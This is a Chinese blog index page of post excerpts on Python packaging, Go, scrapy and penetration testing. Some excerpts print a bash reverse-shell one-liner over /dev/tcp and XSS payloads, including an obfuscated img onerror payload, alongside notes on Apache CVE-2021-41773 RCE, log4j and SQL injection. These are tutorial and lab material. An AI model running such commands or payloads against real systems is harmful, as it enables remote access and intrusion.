- 博客(36)
- 资源 (5)
- 收藏
- 关注
RSS订阅原创 python pyinstaller 打包报病毒、黑框一闪而过
基本的参数,如:# -F 打包为一个文件# -w 除去dos黑框# -i 指定icon文件pyinstaller.exe -F -w -i u.ico pscan.py最近用pyinstaller 打包py程序时,在运行打包成功后的exe时,系统立马弹出警告框说是有病毒,我开始以为是,杀毒软件太敏感,就先手动关闭警告。后来在运行的过程中,有个黑框一闪而过,这太影响体验了,本来不是病毒,人家运行只是,肯定以为含有病毒或者后门之类的..........,后来,经过查找和分析,发现,在py
2022-02-28 20:56:22
7331
原创 golang zip压缩/解压缩用法
最近有个需求,需要写个脚本,但要编译为exe可执行文件,首先考虑python打包,奈何使用pyinstaller打包后,出现各种各样的运行错误,最后放弃了,改为golang重写。因为要用到创建和解压zip文件,golang中使用zip模块的功能,远没有python那么方便。一、压缩部分把文件或者文件夹压缩为zip文件,主要过程就是创建目的zip文件,然后遍历源目录,将源目录下的文件拷贝到目的zip文件中,最重要的2个方法:1、zip.newWriter 创建一个向zip文件中写入的writer.
2022-02-28 00:22:57
5540
原创 红队体系化学习总结
单点的方法均会向方法论过渡。由单维解决方法逐渐向通用解决方案过渡。背后的本质都是知识的体系化。框架后再聚焦,最后量变引起质变。----摘抄于某圈内大佬今天逛论坛时,看到某大佬发的2张图,拜读一下,感叹学海无涯,还没领会到一半,路漫漫还长远啊,自己还差的远。以下图片及知识体系的总结来源于转载。敏捷渗透:红队体系化:...
2022-02-21 21:07:30
414
原创 nginx 正向代理、反向代理、负载均衡
Nginx 是一个高性能的 HTTP 和反向代理服务器,特点是占用内存少,并发能力强,事实上 Nginx 的并发能力确实在同类型的网页服务器中表现较好。Nginx 专为性能优化而开发,性能是其最重要的要求,十分注重效率,有报告 Nginx 能支持高达 50000 个并发连接数。1. Nginx 知识网结构图2. 代理【反向代理】:客户端无法感知代理,因为客户端访问网络不需要配置,只要把请求发送到反向代理服务器,由反向代理服务器去选择目标服务器获取数据,然后再返回到客户端。此时反向代理服务器和目标
2022-02-16 10:02:43
1945
原创 勒索病毒解密工具
加密勒索病毒猖獗,最近逛论坛看到2个好的勒索病毒与解密的站点,记录下,以备不时之需:1、360勒索病毒解密,https://lesuobingdu.360.cn/2.深信服勒索解密工具,https://mp.weixin.qq.com/s/EDJMABKxNMFYDrTEctFYRQ...
2022-02-14 17:57:54
11312
1
原创 log4j漏洞分析及总结
2021年12月8号爆出的log4j2的远程代码执行漏洞【cve-2021-44228】,堪称史诗级核弹漏洞,虽然过了这么久,大部分现网中的相关漏洞已经修复,但任然可以捡漏…,网上也有不少大佬和研究机构都对该漏洞做了分析和复盘,年前年后比较忙,一直没有好好的分析总结该漏洞,最近学习下刚好补上。漏洞描述及影响log4j是Apache的一个开源项目,是一个基于Java的日志记录框架。Log4j2是log4j的后继者,被大量用于业务系统开发,记录日志信息。很多互联网公司以及耳熟能详的公司的系统都在使用该框架。
2022-02-14 00:15:39
42873
2
原创 apache-CVE-2021-41773[42013]-反弹shell
CVE-2021-41773-反弹shellapache-CVE-2021-41773/42013 中存在RCE,可远程执行代码,本想利用bash反弹一个shell,奈何一直没有成功‘’’bash -i >& /de/tcp/ip/port 0>&1‘’’经典的bash反弹,确定环境和语句都没问题后,本地查看了靶机的日志,看到有如下报错,很奇怪,为什么会有一个syntax error:Bad fd number的错误呢,而在本地kali中直接执行该语句,是没有问题的
2022-02-06 17:24:41
1804
1
原创 apache-CVE-2021-41773[42013]-本地验证
cve-2021-41773本地验证上次在验证41773时,使用bash命令反弹shell不成功,vulfocus上提供的时在线靶场环境有时间限制,且无法看到后台日志,不知道时哪里出错了,于是决定从0到1开始,在本地搭建一个实验环境,看看是哪里出现了问题搭建本地验证环境docker 中直接拉取apache 2.4.49的镜像docker pull httpd:2.4.49docker images 查看镜像,如图启动该镜像,运行apache, docker run -d -p 80:80
2022-02-06 16:11:25
3181
原创 apache-CVE-2021-41773[42013]-漏洞复现
apache-CVE-2021-41773[42013] 验证及复现CVE-2021-41773 影响范围为2.4.49CVE-2021-42013 影响范围为2.4.49/50漏洞验证41773和42013在10月份时,被暴出目录穿越和远程命令执行,虽然只影响了apache的49/50版本,但是RCE漏洞,POC已公开,还是有较强的杀伤力。为了快速验证一下该漏洞,使用vulfocus提供的在线的靶场,开启应用,如图访问应用首页,可得到apche服务器版本信息,如图,验证目录遍历利用网上爆
2022-02-05 18:10:02
3226
2
原创 Linux提权(sudo、polkit)总结
Linux-polkit提权总结刚准备休年假,就收到监管的漏洞预警通-“Linux Polkit组件中pkexec程序存在权限提升漏洞(漏洞编号为CVE-2021-4034)。pkexec应用程序为Linux系统预装工具,漏洞影响Ubuntu、Debian、Fedora、CentOS等主流Linux发行版…“,啊,正值冬奥护网,各方都比较敏感,赶紧研究下,详见绿盟的CERT应急通知1、漏洞概述1月26日,绿盟科技CERT监测到Qualys研究团队公开披露了在Polkit的pkexec中发现的一个权限提
2022-01-31 00:21:23
5076
原创 xss常用Payload总结
xss常用Payload总结渗透测试时,常遇到页面输入框、留言板等输入交互点,大多是xss漏洞易出现的常见场景之一,记录几种常用的xss注入的姿势1.img 注入快速探测是否存在xss1) <img src='x' onerror='alert(1)'>2) <img src='x' onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))">2.iframe 注入后台做了相
2022-01-03 14:12:39
11622
2
原创 nmap扫描之端口“filtered“被过滤的分析
最近在做渗透测试时,用nmap扫描目标网站的端口情况,发现某些端口的状态是"filtered",猜测是被防火墙过滤了,那怎么确定端口是否开启或者怎么绕过防火墙进行探测呢?研究了下nmap的高级用法。1、nmap常用扫描参数1.1 sT 扫描3次握手方式的TCP扫描,握手成功后会调用系统的connect函数。由于要完成TCP的3次握手,速度较慢,且这种扫描很容易被检测到,在目标主机的日志中会记录大批的连接请求以及错误信息。nmap默认的扫描方式是这种,如图,...
2021-11-22 17:15:07
34883
4
原创 PHP中命令执行的几种姿势总结(二)-高级用法
上一篇文章中介绍了php命令执行的几种姿势的基础用法 ,除了基础用法之外,还有几种高级用法可以考虑,在服务端过滤严格、安全措施较高的情况下,有时可以派上大用场。1、com组件的使用在php5.4及以上的版本中,可以开启com组件,直接执行某些cmd命令行,如在在php.ini文件中,开启extension=php_com_dotnet.dll...
2021-11-09 14:56:01
561
原创 PHP中命令执行的几种姿势总结(一)
命令执行是web攻击中常用的手法之一,在PHP中,可调用以下函数来实现命令执行,如1、exec()exec函数用的较少,主要是因为该函数默认返回值是执行结果的最后一行,并不会有全部的执行结果。如果要打印执行结果,需遍历打印output数组,1.1 函数原型string exec ( string command, array &output, int &return_var)//command参数是要执行的命令//output数组是保存输出结果//return_va
2021-11-07 12:16:19
3257
原创 vulfocus 靶机环境搭建部署
vulfocus 本质上是一个漏洞集成平台,里面集成了大量的CVE漏洞环境,采用的是docker环境部署安装,使用起来方便,可作为一个优秀靶场环境,提升实战能力。可本地部署安装,也可以直接使用线上环境vulfocus (fofa.so)http://vulfocus.fofa.so/#/login?redirect=%2Fdashboard 类似的漏洞集成环境,如vulhub也是一个不错的实验环境,不过vulfocus的漏洞都比较新,但数量少,vulhub收集的漏洞个数较多,但大多...
2021-11-05 19:21:13
19814
15
原创 从CTF比赛题看任意文件读取的危害
最近在CTF_HUB上看到任意文件读取的一道web渗透测试题,详见ctfhub 中web afr-3,突然想到2020年参加网鼎杯白虎组,有个picdown的题目大同小异,手法相似,对任意文件读取漏洞的危害做个总结。在afr-3中,任意文件读取漏洞如下,首先进入首页,如下图:点进去,首页是个输入框,输入test,提交查询,如图:在输入框这个地方存在xss,不过暂时先不管这个,重点关注任意文件读取。看到url中有个name=article,这个参数,猜测这个参数是突破点,将article.
2021-02-27 22:53:50
2217
原创 python web后端返回excel文件的几种方式
在web后端开发中,经常有遇到返回一个Excel文件给前端的情况,这里以Python 的Flask web框架为例,其他框架类似,总结一下Flask中返回一个xlsx的文件给前端的情况。1、以静态文件的形式返回@app.route('/download_file/<path:filepath>/', methods=["GET"])def download_file(filepath): return app.send_static_file(filepath)2、 以动
2020-11-29 00:10:00
4404
原创 scrapy 爬虫之selenium中间件的使用(爬取简书内容)
前几篇文章中介绍了scrapy简单使用,这次我们来看如何在scrapy中使用selenium作为中间件爬取简书的内容。1、为什么要使用selenium假设我们要爬取简书的内容,打开简书上的某一篇文章,如:https://www.jianshu.com/p/b35ebb1c1b0e,在chrome 调式控制台中,观察发送的请求,user_notes 这部分信息是动态渲染的,无法直接获取到。爬取网页内容时,有些网页内容是后端渲染的,在前端展示时,不需要js再次请求获取显示数据,这类网站对于爬
2020-11-02 22:02:32
2439
原创 scrapy 爬虫之爬取CSDN博客(二)
上篇博客中,介绍了爬取CSDN博客XPATH定位DOM节点和Items数据结构化的使用,下面我们来看scrapy中数据持久化,将数据保存到数据库中(sqlite、mysql、ES、mongodb)中,这里我们选择mysql为例,将爬取到的数据保存到mysql数据库中,其他数据库的存储过程类似。首先安装python操作msyql的驱动程序:pip install -U mysqlclient1、创建pipelines.py文件在创建爬虫项目时,pipelines.py文件是自动生成的,前面说过,
2020-10-30 10:34:11
212
原创 scrapy 爬虫之爬取CSDN博客(一)
上一篇中简单的介绍了scrapy的使用,scrapy爬虫的基本结构,scrapy爬虫的强大远不止如此。本篇进一步探索scrapy爬虫的进阶使用,以爬取CSDN博客内容为例,介绍数据结构化、持久化、xpath定位DOM元素、自定义UA中间件等功能的使用。首先修改上一篇爬取百度网页的spider文件的代码内容,修改后的代码如下:import scrapyclass Spider_CSDN(scrapy.Spider): """docstring for SpiderJSscrapy.Sp
2020-10-28 15:13:26
396
原创 scrapy 爬虫之简单使用
安装好了scrapy爬虫框架后(安装步骤见上一篇博客),开始简单的使用。1、scrapy 命令行工具的使用scrapy的一个强大之处是命令行工具,在命令行下输入:scrapy -h 如图:常用的命令行工具有:crawl 启动爬虫,list 列出当前项目下的所有爬虫,shell 进入爬虫命令行,startproject 新建爬虫项目。2、scrapy 新建爬虫项目使用命令行,输入scrapy startproject exam1,结果如下图:进入到exam1目录,生成
2020-10-27 11:06:17
426
原创 scrapy 爬虫之初识
scrapy 爬虫简介 Scrapy 是一个为了爬取网站数据、提取结构性数据而编写的应用框架,可以应用在包括数据挖掘、信息处理或存储历史数据等一系列的程序中。具有扩展性强、爬取速度快、配置性好等一系列优势,另外scrapy的网上文档比较多,官网文档讲的比较详细,中文文档也不少。在所有的爬虫框架中,srapy是一款不可多得的数据爬取工具。Scrapy 的整体架构由 Scrapy 引擎(ScrapyEngine)、调度器(Scheduler)、下载器(Downloader)、爬虫(Spiders)...
2020-10-26 17:09:35
149
原创 详谈celery的使用一
一、celery简介 celery是python中为数不多的且较为成熟的异步消息处理框架,主要使用场景有:要耗时较长的任务,又不能阻塞主线程,可以将该任务作为异步任务来处理。如在web后台中,执行一次爬虫爬取100个页面的任务,就可以作为一个异步任务来处理。celery不仅包括了消息处理,甚至还具有任务调度的功能,其功能强大,使用方便,性能优良,在分布式消息处理的场景中,经常能见到celery的身影。截止到目前,最新的版本是4.4.7,详见官方网址:https://docs.celeryproj...
2020-09-14 00:47:25
224
原创 反弹shell的使用
反弹shell反弹shell,是指从受害者的机器上主动连接到指定的机器上的可交且能执行命令的TCP进程。反弹shell的前提是受害者的机器上有命令执行的漏洞。常见的一句话反弹shell,如下:bash 反弹shellbash -i >& /dev/tcp/127.0.0.1/9999 0>&1 2>&1 参数解释:bash -i:产生一个bash的交互环境“>&”:将联合符号前面的内容与后面的内容相结合然后一起重定向给后者,将标准
2020-08-15 14:45:11
215
原创 golang build 参数总结
golang build 时常会用到以下参数,如: go build -ldflags="-s -w -H windowsgui" maim.go -o main.exe1.-s strip 去掉无用的符号2.-w DWARF 去掉DWARF调试信息,得到的可执行程序不可用调试器调试3.-H windowsgui 生成带GUI界面的程序时,可去掉dos黑框以上为3个常用的参数,此外-ldflags '-extldflags "-static"' 为静态编译如果,想更加清楚的看到...
2020-07-31 22:40:00
3795
原创 sql注入-报错注入总结
1. 报错注入报错注入作为sql注入的一种有效手段,具有简单、快速、有效的特点,可快速的获取数据中想要的信息,常用的报错函数有4个:1.1. updatexml作用是更新符合xpath的xml对象中的内容为newvalue。函数原型为:updatexml(xmlobj,xpath,newvalue)xmlobj,即xml document 类型为string 格式xpath,类型为string,xpath语法的字符串newvalue,更新后的新值 sql注入中常用的姿势为:update
2020-07-26 23:23:58
397
原创 golang端口占用检测
在运维开发的过程中,经常碰到这样的情况:启动某个应用前,需要先检测一下端口是否被其他的应用占用了,若占用了,能否得到占用进程的PID。后续可以根据这个PID,查找是哪个应用占据这端口,然后KILL掉。非常简单的需求,思路是:利用 netstat 命令获取当前的相关端口号的PID,然后正则表达式过滤出相关的PID即可。netstat -ano | findstr 8099输出如下:以windows 系统下为例,linux系统下,修改相关参数即可。代码如下:// 传...
2020-07-12 18:04:16
5518
1
原创 golang 检查系统中是否安装了某个软件
最近项目有个需求,需要当前判断系统中是否安装了chrome内核的浏览器,如360极速、msedge、chrome等,如果有获取浏览器的位置。网上有各种介绍C#、Python等语言可实现此功能。我的项目是用go开发的,自己整理了一下通过注册表来判断系统是否安装了某个软件。代码如下:// 通过注册表来判断是否安装了某个app// 传入appName,可以是正则表达式,也可以是app的名字// 返回系统中安装软件的路径,若找到了多个,返回路径数组package mainimport...
2020-07-05 00:20:45
1602
原创 从一道CTF题看整数溢出
整数溢出漏洞是程序开发过程中危害较大的一种漏洞,经常是PWN中各大神的突破点,利用此跳板,攻入系统,进而攻陷真个系统。此类漏洞不容易发觉,也不容易引起编程人员的注意。 近期在研究“网鼎杯2020白虎组”的比赛试题中,有一道RE逆向题目-“恶龙”,涉及到整数溢出,如利用此漏洞,可快速拿到Flag。本题解题思路有多种,详见 https://blog.csdn.net/Palmer9/article/details/106117208/,这篇博客中有详细的解释。网上大多数的解法是,动...
2020-06-07 23:35:48
1541
1
原创 BootSpring2.0 @Controller 与@RestController的区别
@Controller Controller注解需要和模板引擎一起配合来使用,如下代码所示(thymeleaf),最后控制器返回模板的名字。使用Controller注解,需要前端和后端相配合,后端处理后(model),页面模板返回到浏览器渲染,课返回htpackage com.example.demo;import org.springframework.stereotype.Co...
2018-08-01 17:38:08
409
原创 matlab2015b 在 ubuntu16.04中启动崩溃的问题(on startup crash)
在ubuntu16.04中装了matlab2015b,结果一启动就崩溃,如下图crash文件:------------------------------------------------------------------------ Segmentation violation detected at Wed Jul 6 12:39:37 2016
2016-07-06 12:35:44
6073
2
原创 opencv2 一个窗口显示多幅图片
opencv 版本:2.4.12操作系统:ubuntu 16.04编辑器:atom 1.8为了将源图像和结果图像数据对比,常常要将多幅图片在一个窗口中显示。方法是首先声明一个大的Mat 作为最后显示的窗口,然后在这个大Mat中提取ROI,然后将原图和结果图拷贝到这两个ROI中。这里用到的函数是Rect 提取ROI区域,然后CopyTo 拷贝原图到ROI区域。源代码如下:#inc
2016-06-15 23:15:17
13358
4
原创 sublime text2 、text 3中打开dos 下 CMD命令行编译运行程序
Text2 和Text3中:在Packages中修改相应的 .sublime-build 文件:如:C/C++.sublime-build{ "cmd": ["g++", "${file}", "-o", "${file_path}/${file_base_name}"], "file_regex": "^(..[^:]*):([0-9]+):?([0-9]+)?
2015-03-10 17:10:55
11200
1
原创 linux 下的多进程和多线程的使用方法及对比
linux 下的多进程和多线程的使用及对比,系统 Ubuntu 14.04 编译器gcc 4.9 linux 下创建进程的函数原型是: pid_t fork(void);这个函数没有参数,却有一个返回值.返回值得的类型是pid_t,其实是pid_t 在32位Linux操作系统下是一个int 型的整数.具体可见pid_t的头文件定义.从pid_t 的名字上可以看出,它代表着
2015-01-09 16:12:01
500
原创 objdump 的一些用法
objdump-目标文件查看器-的用法:1、objdump -h objname;查看目标文件的所有信息 显示出(.text .data .bss .comment .note.GNU-stack)的信息 eg: objdump -h t.o2、objdump -s objname;将objname中的所有段的内容以16进制打印出来 objdump -d objnam
2014-05-06 19:59:57
854
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人